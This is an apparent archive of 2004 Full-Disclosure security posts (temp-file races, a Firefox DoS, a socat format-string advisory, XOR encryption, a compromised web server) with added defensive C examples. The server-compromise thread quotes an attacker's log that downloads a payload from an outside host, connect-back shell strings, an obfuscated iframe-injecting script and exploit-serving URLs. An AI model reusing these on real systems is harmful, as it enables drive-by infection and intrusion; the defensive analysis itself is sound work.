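static int safe_open_fixed(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

static int read_small(const char *path, char *buf, size_t bufsz) {
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, bufsz - 1, f);
    buf[n] = '\0';
    fclose(f);
    return (int)n;
}

/* Runs the scenario: a victim file, a symlink planted at the predictable
 * name, then one write through each pattern. Returns a bitmask of the
 * DEMO_* observations; 7 means all three behaved as described. */
int run_tempfile_demo(void) {
    int flags = 0;
    char dir[] = "/tmp/tmpdemo.XXXXXX";   /* private 0700 sandbox */
    if (!mkdtemp(dir)) return -1;

    char victim[256], link[256], tmp[256], buf[64];
    struct stat st;
    snprintf(victim, sizeof victim, "%s/victim.conf", dir);
    snprintf(link, sizeof link, "%s/send-pr.%ld", dir, (long)getpid());

    FILE *v = fopen(victim, "w");
    if (v) { fputs("original\n", v); fclose(v); }
    if (symlink(victim, link) != 0) { unlink(victim); rmdir(dir); return -1; }

    int fd = unsafe_tempfile(dir, tmp, sizeof tmp);
    if (fd >= 0) { ssize_t w = write(fd, "clobbered\n", 10); (void)w; close(fd); }
    if (read_small(victim, buf, sizeof buf) > 0 && strcmp(buf, "clobbered\n") == 0)
        flags |= DEMO_UNSAFE_FOLLOWED;

    if (safe_open_fixed(link) < 0)              /* fails with EEXIST */
        flags |= DEMO_EXCL_REFUSED;

    int sfd = safe_tempfile(dir, tmp, sizeof tmp);
    if (sfd >= 0 && fstat(sfd, &st) == 0 && S_ISREG(st.st_mode)
        && (st.st_mode & 0777) == 0600 && strcmp(tmp, link) != 0)
        flags |= DEMO_MKSTEMP_OK;
    if (sfd >= 0) { close(sfd); unlink(tmp); }

    unlink(link);
    unlink(victim);
    rmdir(dir);
    return flags;
}

int main(void) {
    printf("tempfile demo flags: %d (7 = all observations hold)\n",
           run_tempfile_demo());
    return 0;
}
```

The same two idioms apply to shell scripts like the ones in the advisories: mktemp(1) is the mkstemp() of the shell, and a fixed name should be created with a no-clobber, no-follow open rather than a plain redirection. The demo uses a private mkdtemp() directory rather than /tmp itself because Linux 3.6 and later ship the fs.protected_symlinks sysctl, which refuses to follow another user's symlink inside a sticky world-writable directory; that sysctl did not exist on the kernels of 2004 and does nothing for predictable names in other writable locations, so the code-level fix is still the one that counts.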

 
[Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash

From: Peter Kruse (krusekrusesecurity.dk)
Date: Mon Oct 25 2004 - 11:30:37 CDT


CSIS Security Advisory [CSIS2004-5]:

Rendering binary file as HTML makes Mozilla Firefox stop responding or crash

Date Published: 10.25.2004

Summary
Mozilla Firefox, Web-browser built for 2004, advanced e-mail and newsgroup
client, IRC chat client, and HTML editing made simple. The Mozilla Firefox
ships with several bugs, making it possible to crash the browser, eat up
virtual memory, simply by hosting a binary renamed as html, on a remote
website.

Vulnerability Class
The browser should remain responsive while displaying large files. Instead
it crashes and hangs and feeds on virtual memory which could cause the
operating system to become unstable.

Details
Internet Explorer, and other browsers, verifies the content of filetypes
before opening in the browser. Based on the content of the file, it decides
what application should be used to open/view the content of the file. This
is, by design, not the case with Mozilla based browsers. A malicious website
can host a large chunk of data, spoofed as an html file that Mozilla will
display within the browser window. Thereby effectively causing a crash on
systems visiting the website.

You can choose any file from your harddisk larger than 5MB, rename it as a
html file, upload it to a remote website, or simply open it directly from
your local harddrive. The result is the same: Mozilla will stop responding,
showing a lot of binary garbage (clearly understandable), before the user is
forced to either end the application or reboot the system.

In several test scenarios the system force feed all virtual memory causing
the system to become unstable. However, this all depends on the size of the
file viewed by the browser. To avoid the user from being suspicious while
the file loads and garbage is showed in the browser window you can format
the website in such a way, that binary code won't show. This way the browser
will show a blank page until it crashes and the system becomes unstable.
When viewed, the browser will load the binary without the users knowledge.
The fact that this bug can be triggered by sending the same file with 1024
ASCII characters pre-pended makes exploitation trivial.

Impact
Low-Medium: This is a remote DoS in Mozilla Firefox. There are several other
ways to crash the browser.

This behavior was confirmed with Mozilla/5.0 (Windows; U; Windows NT 5.1;
rv:1.7.3) Gecko/20040913 Firefox/0.10, but my guess is that all versions of
Mozilla introduce the problem.

Solution
Awaiting fix

Affected Products
Mozilla/5.0 Gecko/20040913 Firefox/0.10 and prior

----
Med venlig hilsen // Kind regards

Peter Kruse,
Security- and virusanalyst,
CSIS, Combined Services & Integrated Solutions
http://www.csis.dk

PGP fingerprint
79FD 0648 158E 6B9E 236F CFDA 7C58 64D6 BE83 FA60


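The advisory's point is that a body the server labels text/html gets rendered whatever its bytes are, and that a check on only the first bytes is not enough, since the same file with 1024 ASCII characters prepended still triggers the bug. The following is an added example, not CSIS's or Mozilla's code: the kind of check a browser or a filtering proxy can run before rendering, classifying bytes as text or binary and capping what is rendered inline. The sample buffers are constructed; the "binary byte" set is the one the later WHATWG MIME Sniffing standard uses.

```c
/* Added example, not CSIS's or Mozilla's code. The advisory's point is that
 * a body labelled text/html gets rendered no matter what its bytes are. This
 * is the kind of check a browser or a filtering proxy can run before
 * rendering: classify the bytes as text or binary, and cap what is rendered
 * inline. The samples are constructed; the "binary byte" set is the one the
 * later WHATWG MIME Sniffing standard uses. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bytes that never occur in text (WHATWG "binary data byte"). */
static int is_binary_byte(unsigned char c) {
    return c <= 0x08 || c == 0x0B || (c >= 0x0E && c <= 0x1A)
        || (c >= 0x1C && c <= 0x1F);
}

/* Scans the first `window` bytes (0 = the whole body); returns 1 on the
 * first binary byte found. */
int contains_binary(const unsigned char *buf, size_t len, size_t window) {
    size_t n = (window && window < len) ? window : len;
    for (size_t i = 0; i < n; i++)
        if (is_binary_byte(buf[i])) return 1;
    return 0;
}

enum verdict { RENDER = 0, REFUSE_BINARY = 1, REFUSE_TOO_LARGE = 2 };

/* Policy for a body the server labelled text/html. The size cap is what
 * actually bounds memory use when the text check is defeated. */
enum verdict classify_html_body(const unsigned char *buf, size_t len,
                                size_t max_render) {
    if (len > max_render) return REFUSE_TOO_LARGE;
    if (contains_binary(buf, len, 0)) return REFUSE_BINARY;
    return RENDER;
}

/* Builds the advisory's trick input: `pad` ASCII bytes followed by a
 * binary blob (a constructed ELF-like header). Returns the total length. */
size_t build_padded_sample(unsigned char *out, size_t outsz, size_t pad) {
    static const unsigned char blob[] = { 0x7F, 'E', 'L', 'F', 0x01, 0x01, 0x01, 0x00 };
    if (pad + sizeof blob > outsz) return 0;
    memset(out, 'A', pad);
    memcpy(out + pad, blob, sizeof blob);
    return pad + sizeof blob;
}

int main(void) {
    unsigned char body[2048];
    size_t n = build_padded_sample(body, sizeof body, 1024);
    printf("512-byte sniff: %d, whole body: %d, verdict: %d\n",
           contains_binary(body, n, 512), contains_binary(body, n, 0),
           (int)classify_html_body(body, n, 1 << 20));
    return 0;
}
```

With a 1024-byte ASCII prefix the 512-byte sniff reports clean while the whole-body scan does not, which is exactly the prepending trick the advisory mentions; the size cap in classify_html_body() is the control that holds regardless of how the bytes are dressed up.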

 
[Full-Disclosure] [ GLSA 200410-26 ] socat: Format string vulnerability

From: Luke Macken (lewkgentoo.org)
Date: Mon Oct 25 2004 - 11:10:05 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-26
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: socat: Format string vulnerability
      Date: October 25, 2004
      Bugs: #68547
        ID: 200410-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

socat contains a format string vulnerability that can potentially lead
to remote or local execution of arbitrary code with the privileges of
the socat process.

Background
==========

socat is a multipurpose bidirectional relay, similar to netcat.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-misc/socat < 1.4.0.3 >= 1.4.0.3

Description
===========

socat contains a syslog() based format string vulnerability in the
'_msg()' function of 'error.c'. Exploitation of this bug is only
possible when socat is run with the '-ly' option, causing it to log
messages to syslog.

Impact
======

Remote exploitation is possible when socat is used as a HTTP proxy
client and connects to a malicious server. Local privilege escalation
can be achieved when socat listens on a UNIX domain socket. Potential
execution of arbitrary code with the privileges of the socat process is
possible with both local and remote exploitations.

Workaround
==========

Disable logging to syslog by not using the '-ly' option when starting
socat.

Resolution
==========

All socat users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/socat-1.4.0.3"

References
==========

  [ 1 ] socat Security Advisory
        http://www.dest-unreach.org/socat/advisory/socat-adv-1.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-26.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBfSVdRsm3eDkOu7kRAqwLAKCXUAuZ/AJ4bdTohy6HF2+iqqc1eQCfX0np
FgTOdLL0crpyupBFYm8yh/8=
=od8O
-----END PGP SIGNATURE-----


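The advisory's Description and Impact sections describe the classic shape of a format string bug: text received from a peer reaches a syslog()/printf-family call as the format itself. The following is an added example, not socat's code, showing that shape beside the fixed form and a small check that flags untrusted strings carrying conversion directives. The sample reply line is constructed.

```c
/* Added example, not socat's code. It shows the shape of the bug the
 * advisory describes, a syslog()/printf-family call that takes peer-supplied
 * text as its format, beside the fixed form, plus a small check that flags
 * untrusted strings carrying conversion directives. The sample reply line
 * is constructed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Constructed text a proxy client might receive from a hostile server. */
static const char sample_reply[] = "HTTP/1.0 407 %s%s%n denied";

/* Vulnerable shape (never call it this way):
 *     syslog(LOG_ERR, msg);        msg is parsed as a format string
 * Hardened: the format is a literal and the text is a %s argument, so
 * any '%' inside it is just data. */
void log_line_safe(int prio, const char *msg) {
    syslog(prio, "%s", msg);
}

/* Same rule for a buffer-building helper in the style of an _msg()
 * routine: literal format, untrusted text only ever through %s. */
int format_log_line(char *out, size_t outsz, const char *where, const char *msg) {
    return snprintf(out, outsz, "%s: %s", where, msg);
}

/* Counts the conversion directives a string would trigger if it were ever
 * used as a format ("%%" is a literal percent and does not count). Usable
 * as a detection rule over inputs or logs: a non-zero count in data that
 * reaches a printf-family call without a literal format is a red flag. */
int count_format_directives(const char *s) {
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        n++;
    }
    return n;
}

/* Returns 1 if the hardened helper carried the hostile text through
 * verbatim: no directive interpreted, no truncation. */
int demo_format_string(void) {
    char line[128];
    int n = format_log_line(line, sizeof line, "proxy", sample_reply);
    const char *expect = "proxy: HTTP/1.0 407 %s%s%n denied";
    return n == (int)strlen(expect) && strcmp(line, expect) == 0;
}

int main(void) {
    printf("directives in sample: %d, safe pass-through: %d\n",
           count_format_directives(sample_reply), demo_format_string());
    return 0;
}
```

GCC's `-Wformat -Wformat-security` warns on exactly the vulnerable shape (a printf-family call whose format is not a literal and that has no further arguments), so building with those flags is a cheap way to surface this class in any code base that logs through syslog().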

 
[Full-Disclosure] Re: [lists] python does mangleme (with IE bugs!)

From: Elliott Bäck (ecb29cornell.edu)
Date: Mon Oct 25 2004 - 11:43:53 CDT


The URL you give for the crash_IE files simply refresh until they get to
http://felinemenace.org/~nd/crash_ie/2447.html and show a 404 error...

Thanks,
Elliott C. Bäck

607-229-0623
119 Blair St. #2
------------------------------------------
www.spreadIE.com
www.elliottback.com

ned wrote:

>i've made a port of mangleme:
>http://felinemenace.org/~nd/htmler.py
>with a few extra quirks (such as file extentions/url types)
>
>it finds IE bugs after roughly 2.5 -> 3 hours and they are at:
>http://felinemenace.org/~nd/crash_ie/
>
>They are not the null pointer dereference that Michal found (which
>curiously seems to not own my 6.0.2800.1106.xpsp1?) but some other
>probably non-exploitable problems!
>
>htmler.py doesn't use CGI like mangleme but generates webpages in the
>directory 'html1' numbered 0.html to n.html. 0.html then uses a refresh to
>load 1.html and so on with little user interaction required!
>
>anyway, if you find bugs with it, don't sell to anyone/notify vendors!
>- nd
>
>
>



 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Mike Hoye (mhoyeneon.polkaroo.net)
Date: Mon Oct 25 2004 - 13:41:10 CDT


On Mon, Oct 25, 2004 at 08:33:41AM -0700, Denis Dimick wrote:
> Use GPG and keychain to store the key.

I've written a little widget that lets you "encrypt" a file using
another file as the "key"; I put those things in quotes because
it's a dumb little thing that does a quick-and-simple xor of the
first file against the other. I realize that this is barely
something you'd call encryption, but it might fill your needs.

It's called xork and it comes with no warranty whatsoever.

http://off.net/~mhoye/xork/

If anyone who is smarter than I am would like to suggest anything,
I'd be glad to hear it.

- Mike Hoye

--
Whenever I hear the question "Did you reboot?", I think of frat guys
in college saying "Didja fuck her?" - Scot Kurruk



 
Re: [Full-Disclosure] Windows Time Synchronization - Best Practices

From: Andrew Farmer (andfarmteknovis.com)
Date: Mon Oct 25 2004 - 14:21:53 CDT


On 24 Oct 2004, at 18:48, Gary E. Miller wrote:
> On Fri, 22 Oct 2004, Micheal Espinola Jr wrote:
>> You can certainly have multiple time servers specified with Windows
>> Time Service (SNTP). RTM. It has the ability to failover through a
>> list.
>
> Yes you can have multiple time servers, but only one active at a time.
> With NTP your client polls a number of diverse servers. Routes can
> flap, servers can go wacko, but your time stays solid.

The canonical *NIX ntp client supports multiple active servers, if
that's what you're talking about.

No idea about Windows, though.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFBfVJRPa6RRaKl0ScRAsdEAJ45ZmyoxE+IkuDMwbmnoK04StDg6gCfXaCX
V3VY/gVPpmoJGHLRamzJ/mM=
=tSMI
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Ron DuFresne (dufresnewinternet.com)
Date: Mon Oct 25 2004 - 16:12:52 CDT


as pertains to compromised systems, the best advice, unless you are doing
forensics to get a handle upon how the system was compromised or seeking
legal damages, is to just plain reinstall and make sure the system is
patched and properly firewalled prior to reconnecting it to the internet.
anything less than a reinstall is likely to permit the attacker to regain
entry to the system. Two points to mention, mysql should not be available
to the public, it should be firewalled off from public consumption, if it
can't be outright killed and uninstalled. php is a problematic
scripting language, and requires someone with intense focus upon security
to lock down. Never use the vast majority of php packages publicly
available, we see 5-10 of them weekly suffering from security issues, some
popping up on a weekly or bi-weekly schedule.

3rd point, in these times with scp and sftp available, ftpd should be
turned off, uninstalled and access only granted via scp/sftp for file
transfers to a server.

Thanks,

Ron DuFresne

On Sun, 24 Oct 2004, Elia Florio wrote:

> Hi list,
> i'm doing some analysis on a Linux-Mandrake 9.0 web server
> of a person that was compromised in October.
> In this host now it's installed a special trojan that insert a
> malicious <IFRAME> tag into every served .PHP page.
>
> The host is running these services :
>
> Porta 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
> Porta 22: SSH-1.99-OpenSSH_3.4p1
> Porta 25: 220 XXXXX ESMTP 5.5.1
> Porta 110: +OK <XXXXXXXXXX>
> Porta 3306: MySQL 3.23.52
> Porte 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake
> Linux/6mdk)
> sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3
>
> I've found inside Apache log that the hacker break-in inside the machine
> using an overflow and injecting an executable /tmp/a.out via "qmail-inject".
> These are the suspicious log lines :
>
> [Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
> fault (11)
> [Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
> fault (11)
> [Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
> fault (11)
> [Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
> <angdimaryahoo.it>
> [Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
> fault (11)
> [Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
> fault (11)
> [Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:
> To: Drugo:Lebowskilibero.it
> sh: -c: option requires an argument
> --15:50:07-- http://xpire.info/cli.gz
> => `/tmp/a.out'
> Resolving xpire.info... fatto.
> Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
> inviata, aspetto la risposta... 200 OK
> Lunghezza: 19,147 [text/plain]
>
> 0K .......... ........ 100% 9.97K
>
> 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
>
> [Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
> fault (11)
> [Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
> fault (11)
>
>
> Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
> Linux,
> possible containing a ConnectBack shell. Inside this ELF file you can grep
> these strings:
>
> Usage: %s host port
> pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
> fork pty, bye!
> Fuck you so
> /bin/sh No connect
> Looking up %s... Failed!
> OK
> %u Connect Back
>
> I don't know if the hacker installs in this machine a rootkit, but the check
> of md5sum of
> ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
> was good.......
>
> The main problem is finding how the Apache Server (or PHP) was altered by
> the hacker,
> because every user that connects to this host now, could be infected by
> several HTML/IE recent exploits.
> Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
> random way??)
> web server inserts a special javascript between HTTP-Header and served page.
> The script is :
>
> <script language=javascript>
> eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
> 01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
> ,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
> 5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
> 16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
> 41))
> </script>
>
> Decoding it, I see that it writes inside the page an <IFRAME> tag pointing
> to this url :
>
> <iframe src='http://www.splitinfinity.info/fa/?d=get' height=1
> width=1></iframe>
>
> If you surf to this page (don't do this if you use IE or are not patched)
> you could got infected
> by several exploits, cause it opens a lot a <iframe> pointing out to
> different domains.
>
> I would to list here these domains, cause they are a sources
> for exploit studying :
>
> Domain: www.sp2fucked.biz
> http://69.50.168.147/user28/counter.htm
>
> Found MHTMLRedir.Exploit
> http://213.159.117.133/dl/adv121.php
>
> http://195.178.160.30/js.php?cust=28
>
> http://195.178.160.30/ifr.php?cust=89
>
> http://69.50.168.147/user28/exploit.htm
>
> Found Java class exploit
> http://69.50.168.147/user28/exploit2.htm
>
> My questions are :
>
> 1) how can I remove this injected Javascript/IFRAME ? I've checked
> httpd.conf and a lot of PHP pages,
> but I don't found anything.....Is it possible that the hacker install some
> compromised Apache module ..so???
>
> 2) anyone knows before these sites (xpire.info or splitinfinity.info)?
> why they are still online and are serving trojan/exploit on surfer browser?
> xpire.info is related to "Mike Fox".....but it sounds as a fake Jonh Doe
> registration!
>
> Domain ID: D5946452-LRMS
> Domain Name: XPIRE.INFO
> Created On: 23-May-2004 19:41:15 UTC
> Last Updated On: 02-Aug-2004 08:07:20 UTC
> Expiration Date: 23-May-2005 19:41:15 UTC
> Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a Directi.com
> (R159-LRMS)
> Status: ACTIVE
> Status: OK
> Registrant ID: C4752858-LRMS
> Registrant Name: Mike Fox
> Registrant Organization: n/a
> Registrant Street1: Hali-gali, 77
> Registrant City: Deli
> Registrant Postal Code: 12345
> Registrant Country: IN
> Registrant Phone: +91.226370256
> Registrant Email: c8idkvtgarwinidkvt38yahoo.com
>
>
> 3) how can I understand if a rootkit was installed???
>
> Thanks anyone for replies
>
> EF
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.


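Elia Florio's quoted message shows the injected script in its obfuscated form and the <IFRAME> it writes once decoded. The program below is an added example, not code from the thread or from any host named in it: a defender-side check that finds an eval(String.fromCharCode(...)) wrapper in a served page body, decodes the byte list so the hidden markup can be read, and pulls out the iframe target for comparison against a block list. The sample page body is constructed around the exact digit list from the quoted message.

```c
/* Added example, not from the thread or from any of the hosts named in it.
 * Defender-side check for the injection quoted above: find an
 * eval(String.fromCharCode(...)) wrapper in a served page body, decode the
 * byte list so the hidden markup can be read, and pull out the iframe
 * target for comparison against a block list. The sample page body is
 * constructed around the digit list from the quoted message. */
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static const char sample_body[] =
    "<html><body>Welcome</body></html>\n"
    "<script language=javascript>\n"
    "eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,"
    "40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,"
    "119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,105,110,"
    "102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,116,61,49,"
    "32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,41))\n"
    "</script>\n";

/* Decodes the comma-separated byte list after "String.fromCharCode(" into
 * out. Returns the decoded length, or -1 if the marker is absent or the
 * list is malformed, out of range, or too long for out. */
int decode_fromcharcode(const char *body, char *out, size_t outsz) {
    static const char marker[] = "String.fromCharCode(";
    const char *p = strstr(body, marker);
    if (!p) return -1;
    p += sizeof marker - 1;
    size_t n = 0;
    for (;;) {
        char *end;
        long v = strtol(p, &end, 10);
        if (end == p || v < 0 || v > 255 || n + 1 >= outsz) return -1;
        out[n++] = (char)v;
        p = end;
        if (*p == ',') { p++; continue; }
        if (*p == ')') break;
        return -1;
    }
    out[n] = '\0';
    return (int)n;
}

/* Detection rule: 1 if the body carries an eval(String.fromCharCode(...))
 * wrapper whose decoded payload writes an <iframe>. */
int has_hidden_iframe_injection(const char *body) {
    char decoded[1024];
    if (!strstr(body, "eval(String.fromCharCode(")) return 0;
    if (decode_fromcharcode(body, decoded, sizeof decoded) < 0) return 0;
    return strstr(decoded, "<iframe") != NULL;
}

/* Extracts the src='...' value from the decoded markup so it can be
 * matched against known bad hosts. Returns 1 and fills src on success. */
int injected_iframe_src(const char *body, char *src, size_t srcsz) {
    char decoded[1024];
    if (decode_fromcharcode(body, decoded, sizeof decoded) < 0) return 0;
    const char *s = strstr(decoded, "src='");
    if (!s) return 0;
    s += 5;
    const char *e = strchr(s, '\'');
    if (!e || (size_t)(e - s) >= srcsz) return 0;
    memcpy(src, s, (size_t)(e - s));
    src[e - s] = '\0';
    return 1;
}

int main(void) {
    char decoded[1024], src[256];
    if (decode_fromcharcode(sample_body, decoded, sizeof decoded) > 0)
        printf("decoded: %s\n", decoded);
    if (injected_iframe_src(sample_body, src, sizeof src))
        printf("iframe target: %s\n", src);
    return 0;
}
```

Run over captured response bodies (on the server, or from a sniffer as Elia did), the decoded src can be compared directly with the domains listed in the quoted message; since the injection was observed only sometimes, sampling many responses rather than one is what makes the check reliable.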

 
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #2001 - 32 msgs

From: Daniel Sichel (danielsPonderosatel.com)
Date: Mon Oct 25 2004 - 17:05:55 CDT


 
>In that case, I assume you are using IPSEC with shared secrets instead
>of certificates, no?
>
You got that right. A certificate is only as good as the server that
issued it, and the directory it's in. Which in the case of Winblows is
not good enough. Therefore my shared secrets are kept in a directory
never shared, secured to the user and admin only, and maintained by
yours truly. If I could use OpenBSD clients instead, I would, but my
boss won't buy off on a pure thin client solution.

Dan S.



 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Aaron Horst (anthrax101gmail.com)
Date: Mon Oct 25 2004 - 19:43:52 CDT


Decoding a file with repetitive XOR encryption is pretty easy. The
only way that this will be even remotely secure is if the encrypted
file is the same length or less than the length of the key file. The
danger then becomes transmitting the key file securely. This is called
a one-time pad. It is important that this key never be used again, or
it can be cracked.

Obviously, this is NOT a good idea for anything other than research
purposes, but it is a good way to learn about the dangers of improper
encryption.

AnthraX101

On Mon, 25 Oct 2004 14:41:10 -0400, Mike Hoye <mhoyeneon.polkaroo.net> wrote:
> On Mon, Oct 25, 2004 at 08:33:41AM -0700, Denis Dimick wrote:
> > Use GPG and keychain to store the key.
>
> I've written a little widget that lets you "encrypt" a file using
> another file as the "key"; I put those things in quotes because
> it's a dumb little thing that does a quick-and-simple xor of the
> first file against the other. I realize that this is barely
> something you'd call encryption, but it might fill your needs.
>
> It's called xork and it comes with no warranty whatsoever.
>
> http://off.net/~mhoye/xork/
>
> If anyone who is smarter than I am would like to suggest anything,
> I'd be glad to hear it.
>
> - Mike Hoye
>
> --
> Whenever I hear the question "Did you reboot?", I think of frat guys
> in college saying "Didja fuck her?" - Scot Kurruk
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>


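AnthraX101's reply states the two conditions under which "xor the file against a key file" is anything more than obfuscation: the key must be at least as long as the data, and it must never be used twice. The program below is an added example, not xork's code. It implements the scheme as described in the thread and demonstrates what goes wrong when each condition is broken. All keys and messages are constructed.

```c
/* Added example, not xork's code. It implements the "xor the file against a
 * key file" scheme the thread describes and demonstrates the two conditions
 * AnthraX101 names: a key shorter than the data is recoverable from a little
 * known plaintext, and a full-length pad used twice lets the two messages
 * cancel it. All keys and messages are constructed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* out[i] = in[i] ^ key[i % keylen]. The same call decrypts. */
void xor_stream(const unsigned char *in, size_t n,
                const unsigned char *key, size_t keylen, unsigned char *out) {
    for (size_t i = 0; i < n; i++)
        out[i] = in[i] ^ key[i % keylen];
}

/* Round trip with the key repeated, as xork-style tools do. */
int xor_roundtrip_ok(void) {
    const unsigned char key[] = "abc";
    const unsigned char msg[] = "round trip";
    unsigned char ct[16], back[16];
    size_t n = strlen((const char *)msg);
    xor_stream(msg, n, key, 3, ct);
    xor_stream(ct, n, key, 3, back);
    return memcmp(back, msg, n) == 0;
}

/* Condition 1: key shorter than the data. If the first keylen bytes of
 * plaintext are known (a fixed file header, say), key = ct ^ pt yields the
 * whole key and therefore every later block. Returns 1 if that works. */
int short_key_recovered_from_header(void) {
    const unsigned char key[] = "k3y!";               /* 4-byte repeating key */
    const unsigned char pt[]  = "HEADER then the rest of the file body";
    unsigned char ct[64], guess[4];
    size_t n = strlen((const char *)pt);
    xor_stream(pt, n, key, 4, ct);
    for (size_t i = 0; i < 4; i++)
        guess[i] = ct[i] ^ pt[i];              /* only the header is "known" */
    return memcmp(guess, key, 4) == 0;
}

/* Condition 2: pad at least as long as the data, but used for two messages.
 * c1 ^ c2 == p1 ^ p2 whatever the pad is, so the pad cancels and knowing
 * one message exposes the other. Returns 1 if message 2 is recovered. */
int reused_pad_exposes_second_message(void) {
    const unsigned char pad[] = "constructed pad, as long as msgs";
    const unsigned char p1[]  = "meeting moved to room 12 at four";
    const unsigned char p2[]  = "bring the signed forms tomorrow!";
    size_t n1 = strlen((const char *)p1), n2 = strlen((const char *)p2);
    size_t n = n1 < n2 ? n1 : n2;                /* compare on the common length */
    if (strlen((const char *)pad) < n) return 0;

    unsigned char c1[64], c2[64], recovered[64];
    xor_stream(p1, n, pad, n, c1);               /* pad used once ... */
    xor_stream(p2, n, pad, n, c2);               /* ... and once more */
    for (size_t i = 0; i < n; i++)
        recovered[i] = c1[i] ^ c2[i] ^ p1[i];    /* no pad bytes needed */
    return memcmp(recovered, p2, n) == 0;
}

int main(void) {
    printf("roundtrip=%d short-key-recovered=%d pad-reuse-leaks=%d\n",
           xor_roundtrip_ok(), short_key_recovered_from_header(),
           reused_pad_exposes_second_message());
    return 0;
}
```

One condition the thread does not spell out: for the one-time-pad argument to hold, the pad bytes must be uniformly random, so a key file that is itself text (or any other structured file) fails even when it is long enough and used once.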

 
[Full-Disclosure] Posting w/o checking facts

From: Harry Hoffman (hhoffmanip-solutions.net)
Date: Mon Oct 25 2004 - 22:43:39 CDT


Hi,

Ok, I didn't think this needed to be said but why the hell are ppl
posting exploits without doing any actual testing?

WTF is up with that. Umm, ok I can say that XYZ is a problem cause it
"looks like it may be one".

NO, YOU CAN'T!!!! Or rather you can but then when everyone says your
name while trying to hold back a snicker don't seem surprised.

If you think something is a problem then test it! If you can't test it
then say so *clearly* in your post.

Making wild claims that a user's session can be hijacked or that you can
force your way into the xyz system without testing makes you sound
stupid (usually with good reason).

There have been at least three posts within the past couple of weeks
that make claims that are questionable at best and certainly don't come
with proof (or even anything that might closely resemble anything near
proof).

My $0.02 cents (and I'm sure others will share one way or another) ;-)

--Harry



 
